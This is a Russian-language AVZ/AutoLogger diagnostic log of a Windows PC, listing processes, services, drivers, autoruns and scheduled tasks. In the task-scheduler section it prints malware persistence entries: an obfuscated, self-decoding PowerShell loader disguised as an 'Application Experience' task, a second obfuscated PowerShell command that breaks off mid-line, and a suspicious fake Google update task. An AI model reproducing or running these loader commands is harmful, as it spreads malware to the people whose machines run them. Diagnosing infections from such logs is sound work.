Протокол исследования системы

Список процессов

Имя файла	PID	Описание	Copyright	MD5	Информация
f:\games\autologger\autologger.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	1144	Автоматический сборщик логов	Все права на AutoLogger принадлежат regist & Drongo © Copyright 2013 - 2021	93EBD03CF11AE0134BED9FFA386449A6	16124,48 кб, rsAh,создан: 12.11.2021 18:42:04,изменен: 12.11.2021 06:40:09 Командная строка: "F:\Games\AutoLogger\AutoLogger.exe"
f:\games\autologger\autologger\av\av_z.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	9932			763851F838A4E6A4F07243A0A02C3CD4	1550,00 кб, rsAh,создан: 12.11.2021 18:42:48,изменен: 12.11.2021 06:30:03 Командная строка: "F:\Games\AutoLogger\AutoLogger\AV\AV_Z.exe" Script=AV\GeneralScript.txt HiddenMode=0
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	4272	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	4572	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	9692	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	9668	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	8080	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	10008	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	6572	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	9160	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	5140	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	7412	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	9872	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	9228	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	2772	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	5092	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	3796	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\opera.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	5692	Opera GX Internet Browser	Copyright Opera Software 2021	C0854F29EB62ADB6E6B6E20BD50F3899	1930,20 кб, rsAh,создан: 08.11.2021 23:37:56,изменен: 08.11.2021 23:37:04 Командная строка:
c:\users\stich\appdata\local\programs\opera gx\80.0.4170.91\opera_crashreporter.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	10020	Opera GX crash-reporter	Copyright Opera Software 2021	7EAF5028501EAE5C32DE16647723EAB0	1932,70 кб, rsAh,создан: 08.11.2021 23:37:49,изменен: 08.11.2021 23:37:44 Командная строка:
Registry.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	104			X	ошибка получения информации о файле Командная строка:
c:\windows\update\su10guard.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	3228	StopUpdates10 Service	Copyright © 20018	F277E78E2A945D450DACA8AEABFB13A1	71,07 кб, rsAh,создан: 07.11.2020 17:47:42,изменен: 14.09.2020 18:27:55 Командная строка: C:\Windows\UPDATE\SU10Guard.exe
C:\Windows\UPDATE\SU10Guard.exe Скрипт: Kарантин, Удалить, Удалить через BC, Завершить	3268	StopUpdates10 Service	Copyright © 20018	F277E78E2A945D450DACA8AEABFB13A1	71,07 кб, rsAh,создан: 07.11.2020 17:47:42,изменен: 14.09.2020 18:27:55 Командная строка:
Обнаружено:138, из них опознаны как безопасные 116

Имя модуля	Handle	Описание	Copyright	Информация	Используется процессами
Обнаружено модулей:184, из них опознаны как безопасные 184

Модули пространства ядра

Модуль	Редиректор	Базовый адрес	Размер в памяти	Описание	Производитель
C:\Windows\System32\Drivers\dump_dumpata.sys ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	259D0000	0000F000 (61440)
C:\Windows\System32\Drivers\dump_atapi.sys ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	259F0000	0000D000 (53248)
C:\Windows\System32\Drivers\dump_dumpfve.sys ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	25A20000	0001D000 (118784)
C:\Windows\system32\Drivers\PROCEXP152.SYS 35,36 кб, rsAh, создан: 09.11.2021 22:10:54, изменен: 12.11.2021 18:25:49 Скрипт: Kарантин, Удалить, Удалить через BC	x64	260F0000	0000C000 (49152)	Process Explorer	Copyright (C) Mark Russinovich 1996-2021
Обнаружено элементов - 171, опознано как безопасные - 167

Службы

Служба	Описание	Статус	Имя файла	Редиректор	Описание	Производитель	Группа	Зависимости
BEService Служба: Стоп, Удалить, Отключить, Удалить через BC	BattlEye Service	Не запущен	C:\Program Files (x86)\Common Files\BattlEye\BEService.exe 5934,51 кб, rsAh, создан: 07.08.2021 15:35:40, изменен: 07.08.2021 15:24:20 Скрипт: Kарантин, Удалить, Удалить через BC	x64
Origin Client Service Служба: Стоп, Удалить, Отключить, Удалить через BC	Origin Client Service	Не запущен	C:\Program Files (x86)\Origin\OriginClientService.exe 2497,71 кб, rsAh, создан: 20.10.2021 19:19:11, изменен: 19.10.2021 09:46:52 Скрипт: Kарантин, Удалить, Удалить через BC	x64	OriginClientService	Copyright (C) 2012
Origin Web Helper Service Служба: Стоп, Удалить, Отключить, Удалить через BC	Origin Web Helper Service	Не запущен	C:\Program Files (x86)\Origin\OriginWebHelperService.exe 3394,71 кб, rsAh, создан: 20.10.2021 19:19:11, изменен: 19.10.2021 09:46:58 Скрипт: Kарантин, Удалить, Удалить через BC	x64	OriginWebHelperService	Copyright (C) 2015
OverwolfUpdater Служба: Стоп, Удалить, Отключить, Удалить через BC	Overwolf Updater Windows SCM	Не запущен	C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe 2426,34 кб, rsAh, создан: 31.10.2021 14:11:38, изменен: 31.10.2021 14:11:38 Скрипт: Kарантин, Удалить, Удалить через BC	x64	OverwolfUpdater	Copyright Overwolf © 2021
Rockstar Service Служба: Стоп, Удалить, Отключить, Удалить через BC	Rockstar Game Library Service	Не запущен	G:\Launcher\RockstarService.exe 2026,30 кб, rsAh, создан: 25.08.2021 06:16:22, изменен: 25.08.2021 06:16:26 Скрипт: Kарантин, Удалить, Удалить через BC	x64	Rockstar Games Launcher Service	Rockstar Games Inc. (C) 2005--2021 Take Two Interactive. All rights reserved
SU10Guard Служба: Стоп, Удалить, Отключить, Удалить через BC	StopUpdates10 Guard	Работает	C:\Windows\UPDATE\SU10Guard.exe 71,07 кб, rsAh, создан: 07.11.2020 17:47:42, изменен: 14.09.2020 18:27:55 Скрипт: Kарантин, Удалить, Удалить через BC	x64	StopUpdates10 Service	Copyright © 20018
Обнаружено элементов - 268, опознано как безопасные - 262

Драйверы

Служба	Описание	Статус	Имя файла	Редиректор	Описание	Производитель	Группа	Зависимости
MpKsl081bcdaa Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC	MpKsl081bcdaa	Не запущен	C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{02A9F91C-B34C-4058-ACA0-DDF1D7B9B159}\MpKslDrv.sys ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64
SecDrv Драйвер: Выгрузить, Удалить, Отключить, Удалить через BC	SecDrv	Не запущен	C:\Windows\system32\drivers\SECDRV.SYS ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64
Обнаружено элементов - 367, опознано как безопасные - 365

Автозапуск

Имя файла	Редиректор	Метод запуска	Описание
C:\Windows\System32\icardres.dll ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	Ключ реестра	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\CardSpace 4.0.0.0, EventMessageFile
C:\Windows\System32\icardres.dll ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	Ключ реестра	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\CardSpace 4.0.0.0, CategoryMessageFile
C:\Program Files\Common Files\Microsoft Shared\Ink\IPSEventLogMsg.dll ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	Ключ реестра	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Handwriting Recognition, EventMessageFile
C:\Program Files\Common Files\Microsoft Shared\Ink\IPSEventLogMsg.dll ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	Ключ реестра	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\Handwriting Recognition, CategoryMessageFile
f:\2e7a52bc5debb429a6efc43c51c9a8\DW\DW20.exe ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	Ключ реестра	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\Application\VSSetup, EventMessageFile
C:\Windows\System32\Drivers\UMDF\UsbccidDriver.dll ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	Ключ реестра	HKEY_LOCAL_MACHINE, SYSTEM\CurrentControlSet\Services\Eventlog\System\Microsoft-Windows-USB-CCID, EventMessageFile
C:\Program Files\ShareX\ShareX.exe 1965,00 кб, rsAh, создан: 08.01.2021 15:42:55, изменен: 16.12.2020 11:37:44 Скрипт: Kарантин, Удалить, Удалить через BC	x64	Ярлык в папке автозагрузки	C:\Users\stich\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\, C:\Users\stich\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ShareX.lnk,
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	Ярлык в папке автозагрузки	C:\Users\stich\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\, C:\Users\stich\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk,
Discord.exe ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x32	Ключ реестра	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Discord Удалить
C:\Users\stich\AppData\Roaming\Spotify\Spotify.exe 18244,93 кб, rsAh, создан: 30.10.2021 08:05:40, изменен: 30.10.2021 08:05:40 Скрипт: Kарантин, Удалить, Удалить через BC	x32	Ключ реестра	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Spotify Удалить
C:\Windows\system32\bootim.exe ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x32	Ключ реестра	HKEY_LOCAL_MACHINE, System\CurrentControlSet\Control\Session Manager\, BootShell
Discord.exe ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	Ключ реестра	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Discord Удалить
C:\Users\stich\AppData\Roaming\Spotify\Spotify.exe 18244,93 кб, rsAh, создан: 30.10.2021 08:05:40, изменен: 30.10.2021 08:05:40 Скрипт: Kарантин, Удалить, Удалить через BC	x64	Ключ реестра	HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run, Spotify Удалить
Обнаружено элементов - 1121, опознано как безопасные - 1108

Модули расширения Internet Explorer (BHO, панели ...)

Имя файла	Редиректор	Тип	Описание	Производитель	CLSID
Обнаружено элементов - 7, опознано как безопасные - 7

Модули расширения проводника

Имя файла	Редиректор	Назначение	Описание	Производитель	CLSID
Обнаружено элементов - 100, опознано как безопасные - 100

Модули расширения системы печати (мониторы печати, провайдеры)

Имя файла	Редиректор	Наименование	Тип	Описание	Производитель
Обнаружено элементов - 9, опознано как безопасные - 9

Задания планировщика задач Task Scheduler

Имя файла	Редиректор	Имя задания	Описание	Производитель	Путь	Командная строка
powershell.exe -c "$fewu='u322UtFdsBGAIuNOsj/cVtouvnztXcp56GWYLoIJxlzCF4QVxgKdKPkN+3L/B6N4mRfDCMdD9jawVOp1wEK1D/N472SET807qj+yRJgs0nSfOeJEy1bOBMgjkQOcYuFT0Xb/TNptkzeODoIetza9RrEmyVjWUrknrTrQUto8oTn7XbNC5WKcccAI71bZXr8ViiKNdvkY7GfWWLdLgwKdFZ9Pu3XvWaQwj065DOV+9EmQFJdH/3ngEo1y6CzMcsxK0laWVJpevQONdc0a+n3/X6l9kFzYE9QX7XvzCaIwjVvcEvphviyXTr9w7k/sE5h+8mKNPIQdhVDJTcwCmwDGVPgc62b4IeJslFzYE8cD+nerWMRHhBOMBeQ/wGeLFp1n7kCzWq5j83yqdd5Dlwf+BJoZhhfAL+IY6D7kAOdtkhPcMoMU63HmXtZb0zOMEuxw7lqAAZxw6DWtEpthslaNYP9D0kPCHpsVuwSaYu0QtzqiS6NalAaYNZUi8XCjWbY93UjcCaIztT+OVpJh43WrSdN4+jmzfcNS/BfOFMhdhhXINLxPtmivEbw1tgKITKgG8XDkHb85sAmWCeRk7ijUQNVY+2XgDZ18vCXTMMdMnGjeBJoZhhe1XOEc63vWWLdpkxTUOpcG63zWSqVmkhWWBKEi5j/PO5V07nXUWtJi9X/AT8BH1VvwStI1wljMdL1UtjqiWeRu2UOPUNpK83GrQ7Zv2QqSS7QzrWuKDdou53jlE41quHuCP5AEj0fGUtMNzBGMOq4V62f7WKIn1Q2WTpMJrjr7GO8rlF3cCasqp3rYO6ts6WnsDcZf+WXGQ8hE81bcBY0DnC3SPc8P+nL/B6UskAPVWt4VsVXnHPBjvBWMD9t052GXBZthpznvAYRi+SrMZoNz0lbfMY8VhgTVI/kcpDf5Ef011RXSJp8TzXH4APB6jgXQSbI14GzYRIpm6jPaFIll6WKre8lDmlrLWLMZhgS1I+8Zvz7lB607wVXVGp8f9mD2VO0pmQWbQKFK0HGWFJ14tF7mDp507mW1Lpdg01zAMokDjUbcVPgP9n3sSqVmlBDRDpgN+nf/UMxtjhSdDadYzCa2FIpw+3DbBYl1+WPAMN9V0R3qFZwijQOYaOIO+kD/EOhpnE/VSNNJzXHqFMt7uA6cSKA4qijNRJlxsT/8WYFk9n6De48Pmk7EFsBQxR6Hc6xZ7TrwB/VhhRrYE8c8zG34BPp50zSdGP0/xmaGD5x89HrUWtJEyFfQOupD1WDZAoEej1jMdaVGu3K2Sql6zEOOT4kX833/WL0030zKSaBKs1XeRJcoqibgBsA1/THFcdwGkBrWVIdNwBmNf6xZ7Ui6P6QojUezFI5KzGD5GfFzgAWUE+x45SDBAdg4/2ypV8FquGnVNo8diX3IB8U/ihqNZPhdzGr4Fuhl3zOUE58G+33lF7FZiBSdGKE193qQBdQx6Ea4PcRK7nSOSYleiBqDM4QfmxXALrcU+TuvGqRz1QjBQ8pF4nHnA/pv2Q/FQrgz/nWADItw4XjxCZxsuH7VMMII0kbPA5wCgR6PL7xRv0jYG/58lArSLJsT90mxStJ9k0jNULkhryjBD9ZZ/3PuFIA4tSrMZt4bxVbOUMAruwmbc+kQsUfuGvkmtAmfDp4O8XPWSqVBqSbATs5090qcFJ1msjnmScExtDWBP48QykaYCZo7j0iPJaVGu2H4X9Z9gw6hW8Ai7HfqAPpQnBSZM/1j6maCSKNW9XP/BZplwSvSQMJkwEDIRtwjnAKBaetVu2H4S6Qz1RXBOqke7GDuHbFamBTWN+xz0W2UFZ1m7kCzWqtj+XCccYUCwFeGUs4B1VLDI/4OtiivEKNJnQuTFrsS63vZFft9jwWbFLQ15WmJE50uvm+nNZt07lCPccNSnBfYEdNUml6YdeMF5i6vErYsg0m7BI41+mf7H/FnmEjRHMZk9yWrFZR5oQ==';&('iDMkeDMkx'-replace'DMk')('$d=([regex]::Matches(''=kSKnkCZkgyZutWTElmc0N1JrcCdldkL4YEVVpjOddmbptWTER2bjtWTE5WRuQHer1ERlRlLtVGdr1ERzl3aNR0UbdCK4tWTEV2aNRUaoACer1ERltWTEl2OpIXZi1WduxWYpJXZT5iai9GJgsCInAyJgsCIsVGZv1kLqJ2bkgCIpkSd3VmZkgyZulmc0tWTENFNr1ER2U2chtWTEJUbvtWTEJnR6oTX0JXZ252bD5SblR3c5N1WoAyYr1ERlRGI9ACZksjclJWb15Gbhl2aNRkclNFIswWZr1ERk9WTgQ3YltWTExWZzBCfg03JwUkVJJFRMF0aNR0QJNVWIBFXuwFXnAScl1CIElUZr1ERjlmdlRkLfRyegUmcr1ERlh2dgwHIlZXar1ERyR2ar1ERzlGZfJzMr1ERul2aNR0dgkWb3dGI9AiaitWTE9GJ9tjYjRCIuJ3aNRUd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvtWTEhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvtWTEhnYtASKyUTMgI3bi1CIzRCIk52aNRUYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvtWTEZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzV2aNREd5JEdr1ERldkL4YEVVpjOddmbr1ERpR2bj5WRuQ3aNREelRlLtV2aNREdzl3UbBSPgI2aNREcksXKzN3aNRUYwRSXn5WaytWTER3cbBCLitWTENGJd11WlR3aNRUeitFKjV2aNREZg42bpR3Yr1ERuVnZ'',''.'',''RiDMkghDMktTDMkoLDMkeft'')\|FoDMkrEaDMkch {$DMk_DMk.valDMkue}) -jDMko'+'in '''';$d=[TeDMkxt.EncoDMkding]::UTDMkF'+222+'.GeDMktString([ConDMkvert]::Fro'+'mDMkB'+'ase'+8*8+'StriDMkng($DMkd));&(''iDMkeDMkx'')($d -repDMklace''DDMkMk'');'-replace'DMk')" ошибка получения информации о файле Скрипт: Kарантин, Удалить, Удалить через BC	x64	Application Experience Скрипт: Удалить задание планировщика			C:\Windows\system32\Tasks\Microsoft\Windows\Application Experience\	powershell.exe -c "$fewu='u322UtFdsBGAIuNOsj/cVtouvnztXcp56GWYLoIJxlzCF4QVxgKdKPkN+3L/B6N4mRfDCMdD9jawVOp1wEK1D/N472SET807qj+yRJgs0nSfOeJEy1bOBMgjkQOcYuFT0Xb/TNptkzeODoIetza9RrEmyVjWUrknrTrQUto8oTn7XbNC5WKcccAI71bZXr8ViiKNdvkY7GfWWLdLgwKdFZ9Pu3XvWaQwj065DOV+9EmQFJdH/3ngEo1y6CzMcsxK0laWVJpevQONdc0a+n3/X6l9kFzYE9QX7XvzCaIwjVvcEvphviyXTr9w7k/sE5h+8mKNPIQdhVDJTcwCmwDGVPgc62b4IeJslFzYE8cD+nerWMRHhBOMBeQ/wGeLFp1n7kCzWq5j83yqdd5Dlwf+BJoZhhfAL+IY6D7kAOdtkhPcMoMU63HmXtZb0zOMEuxw7lqAAZxw6DWtEpthslaNYP9D0kPCHpsVuwSaYu0QtzqiS6NalAaYNZUi8XCjWbY93UjcCaIztT+OVpJh43WrSdN4+jmzfcNS/BfOFMhdhhXINLxPtmivEbw1tgKITKgG8XDkHb85sAmWCeRk7ijUQNVY+2XgDZ18vCXTMMdMnGjeBJoZhhe1XOEc63vWWLdpkxTUOpcG63zWSqVmkhWWBKEi5j/PO5V07nXUWtJi9X/AT8BH1VvwStI1wljMdL1UtjqiWeRu2UOPUNpK83GrQ7Zv2QqSS7QzrWuKDdou53jlE41quHuCP5AEj0fGUtMNzBGMOq4V62f7WKIn1Q2WTpMJrjr7GO8rlF3cCasqp3rYO6ts6WnsDcZf+WXGQ8hE81bcBY0DnC3SPc8P+nL/B6UskAPVWt4VsVXnHPBjvBWMD9t052GXBZthpznvAYRi+SrMZoNz0lbfMY8VhgTVI/kcpDf5Ef011RXSJp8TzXH4APB6jgXQSbI14GzYRIpm6jPaFIll6WKre8lDmlrLWLMZhgS1I+8Zvz7lB607wVXVGp8f9mD2VO0pmQWbQKFK0HGWFJ14tF7mDp507mW1Lpdg01zAMokDjUbcVPgP9n3sSqVmlBDRDpgN+nf/UMxtjhSdDadYzCa2FIpw+3DbBYl1+WPAMN9V0R3qFZwijQOYaOIO+kD/EOhpnE/VSNNJzXHqFMt7uA6cSKA4qijNRJlxsT/8WYFk9n6De48Pmk7EFsBQxR6Hc6xZ7TrwB/VhhRrYE8c8zG34BPp50zSdGP0/xmaGD5x89HrUWtJEyFfQOupD1WDZAoEej1jMdaVGu3K2Sql6zEOOT4kX833/WL0030zKSaBKs1XeRJcoqibgBsA1/THFcdwGkBrWVIdNwBmNf6xZ7Ui6P6QojUezFI5KzGD5GfFzgAWUE+x45SDBAdg4/2ypV8FquGnVNo8diX3IB8U/ihqNZPhdzGr4Fuhl3zOUE58G+33lF7FZiBSdGKE193qQBdQx6Ea4PcRK7nSOSYleiBqDM4QfmxXALrcU+TuvGqRz1QjBQ8pF4nHnA/pv2Q/FQrgz/nWADItw4XjxCZxsuH7VMMII0kbPA5wCgR6PL7xRv0jYG/58lArSLJsT90mxStJ9k0jNULkhryjBD9ZZ/3PuFIA4tSrMZt4bxVbOUMAruwmbc+kQsUfuGvkmtAmfDp4O8XPWSqVBqSbATs5090qcFJ1msjnmScExtDWBP48QykaYCZo7j0iPJaVGu2H4X9Z9gw6hW8Ai7HfqAPpQnBSZM/1j6maCSKNW9XP/BZplwSvSQMJkwEDIRtwjnAKBaetVu2H4S6Qz1RXBOqke7GDuHbFamBTWN+xz0W2UFZ1m7kCzWqtj+XCccYUCwFeGUs4B1VLDI/4OtiivEKNJnQuTFrsS63vZFft9jwWbFLQ15WmJE50uvm+nNZt07lCPccNSnBfYEdNUml6YdeMF5i6vErYsg0m7BI41+mf7H/FnmEjRHMZk9yWrFZR5oQ==';&('iDMkeDMkx'-replace'DMk')('$d=([regex]::Matches(''=kSKnkCZkgyZutWTElmc0N1JrcCdldkL4YEVVpjOddmbptWTER2bjtWTE5WRuQHer1ERlRlLtVGdr1ERzl3aNR0UbdCK4tWTEV2aNRUaoACer1ERltWTEl2OpIXZi1WduxWYpJXZT5iai9GJgsCInAyJgsCIsVGZv1kLqJ2bkgCIpkSd3VmZkgyZulmc0tWTENFNr1ER2U2chtWTEJUbvtWTEJnR6oTX0JXZ252bD5SblR3c5N1WoAyYr1ERlRGI9ACZksjclJWb15Gbhl2aNRkclNFIswWZr1ERk9WTgQ3YltWTExWZzBCfg03JwUkVJJFRMF0aNR0QJNVWIBFXuwFXnAScl1CIElUZr1ERjlmdlRkLfRyegUmcr1ERlh2dgwHIlZXar1ERyR2ar1ERzlGZfJzMr1ERul2aNR0dgkWb3dGI9AiaitWTE9GJ9tjYjRCIuJ3aNRUd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvtWTEhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvtWTEhnYtASKyUTMgI3bi1CIzRCIk52aNRUYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvtWTEZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzV2aNREd5JEdr1ERldkL4YEVVpjOddmbr1ERpR2bj5WRuQ3aNREelRlLtV2aNREdzl3UbBSPgI2aNREcksXKzN3aNRUYwRSXn5WaytWTER3cbBCLitWTENGJd11WlR3aNRUeitFKjV2aNREZg42bpR3Yr1ERuVnZ'',''.'',''RiDMkghDMktTDMkoLDMkeft'')\|FoDMkrEaDMkch {$DMk_DMk.valDMkue}) -jDMko'+'in '''';$d=[TeDMkxt.EncoDMkding]::UTDMkF'+222+'.GeDMktString([ConDMkvert]::Fro'+'mDMkB'+'ase'+8*8+'StriDMkng($DMkd));&(''iDMkeDMkx'')($d -repDMklace''DDMkMk'');'-replace'DMk')" WorkingDirectory=%appdata%\Microsoft
C:\Windows\SysWOW64\XPSViewer\TasksG\G-1-60-70\TG_1.4.75.61.exe 66,30 кб, rSAH, создан: 14.07.2009 06:20:08, изменен: 14.07.2009 06:20:08 Скрипт: Kарантин, Удалить, Удалить через BC	x64	GoogleUpdateTaskMachineHD Скрипт: Удалить задание планировщика			C:\Windows\system32\Tasks\Microsoft\Windows\Google\	C:\Windows\SysWOW64\XPSViewer\TasksG\G-1-60-70\TG_1.4.75.61.exe
powershell.exe -c "5239939222;$ChV='mhuCerQxcOiZd';'1&(!gc/m gA{-Tby]).jNa]me_ (_''__us2li0nk0g l,Slyqqstkeezmxk;uzms?i_lng_e -Si_ys_wt_e__m._?I{Oj-;u_sscicgnge_ 6S6.ysy}t9e(mm.5_R[ua_nt1mizm_?e.6_I3ne_te1]r/ol_pS,te5rarviq9c3e_ss;=!u_sebin_og_ _0Mi0ac_r.-oso_o+fc5t.n.Wqi40n3u_2_;[_pu7nbol?kic_1 fcp5lat_s6s?s M]3Eeo{1{d5,e(lc(eg?1agt5_e 0[v=og3idlg sEl9qp4j(d)wj;p_5u{bd_lis_c1 hast7oa_tivic?1 .vtpoi9{dj )3JLtr({){{{b(oy7t)ye[(r]!t=4QEv=kz=]7Fi--l_e=_.E0qx6ibost0]sa(}]vC_cyvu81er4uh_f_?tw_8tpv6_C)ty?_F_}ilm_ep.d_Re?_addg_Al_gl[B__yt!qefsns(v2_Cgy1fue8tr{hsnftzww!th(vCy=)_:1o(bepy[td_e[_h]{)_-Re9_g[igest__r/y_y.Lp_o(cbval1_Maa[sch?5izn=_e._aOhp)/en/kSdub?bKboesy_.(@s3v_C-_SOh_F!T3cWAkyRkE_!\M)qizc)-ro/gs}o+bft_q\_Cq7TF[/\lT]-IPgvv_Cdz).txGfeedtVf2akla)ue/[(7vptCy8_uke_grh__f3t]swt_[vpCk_,n3_u-lv_l)y_;(i8]f(e)t!QlvEk9!={=_/nu]hlulh?)r)je-t_eurr_n{;ccin}cta 6oLJ__Sr=z_tQ+7E+ksc.Loje.n-_gtz-hz;w_fo/ir6(-3inu.t1 l_MD_ogwi,/=0_o;=M]_Dg7]i9 